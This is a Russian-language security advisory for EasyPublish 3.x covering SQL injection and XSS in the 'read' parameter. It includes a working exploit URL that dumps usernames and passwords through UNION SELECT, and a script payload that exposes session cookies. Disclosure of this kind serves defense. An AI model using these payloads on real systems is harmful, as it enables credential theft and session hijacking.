Программа: EasyPublish 3.x

Уязвимость позволяет удаленному пользователю осуществить XSS нападение и
выполнить произвольные SQL команды в базе данных приложения.

1) Уязвимость существует из-за недостаточной обработки входных данных в
параметре "read" сценарием staticpages/easypublish/index.php. Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.

Эксплоит:

http://Example/staticpages/easypublish/index.php?PageSection=0&table=edp_News&
page=individual&fage=search&read=1+union+all+select+1,concat(0x4c6f67696e3a,
puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,
puPassword,0x3c656e64706173733e),3,4,1,5+FROM+edp_puusers/*;--

2) Уязвимость существует из-за недостаточной обработки входных данных в
параметре "read" сценарием staticpages/easypublish/index.php. Атакующий может
выполнить произвольный сценарий в браузере жертвы в контексте безопасности
уязвимого сайта.

Эксплоит:

http://Example//staticpages/easypublish/index.php?PageSection=0 &page=individual&table=edp_News&read=%<script>alert(document.cookie);</script>

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии